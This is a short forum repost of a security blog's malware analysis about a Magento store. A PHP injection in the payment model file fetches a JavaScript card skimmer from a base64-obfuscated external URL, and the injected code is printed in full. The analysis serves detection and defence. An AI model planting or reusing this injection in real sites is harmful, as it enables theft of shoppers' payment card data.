National Cyber Warfare Foundation (NCWF) Forums


Magento PHP Injection Loads JavaScript Skimmer


0 user ratings
2021-01-21 21:30:39
milo
Ransomware

Magento PHP Injection Loads JavaScript Skimmer


A Magento website owner was concerned about malware and reached out to our team for assistance. Upon investigation, we found the website contained a PHP injection in one of the Magento files: ./app/code/core/Mage/Payment/Model/Method/Cc.php


...

if ($_SERVER["REQUEST_METHOD"] === "GET"){

if (strpos($_SERVER["REQUEST_URI"], "/onestepcheckout/index/") !== false){

if(!isset($_COOKIE["adminhtml"])){

echo file_get_contents(base64_decode("aHR0cHM6Ly91bmRlcnNjb3JlZndbLl1jb20vc3JjL2tyZWEuanM="));

}

}

}


To make it more difficult to detect, the JavaScript skimmer is loaded using the PHP function file_get_contents and the URL obfuscated with base64.


Continue reading Magento PHP Injection Loads JavaScript Skimmer at Sucuri Blog.


The post Magento PHP Injection Loads JavaScript Skimmer appeared first on Security Boulevard.




Luke Leal

Source: Security Boulevard
Source Link: https://securityboulevard.com/2021/01/magento-php-injection-loads-javascript-skimmer/


Comments
new comment
Nobody has commented yet. Will you be the first?
 
return to home



Copyright 2012 through 2021 - National Cyber Warfare Foundation - All rights reserved worldwide.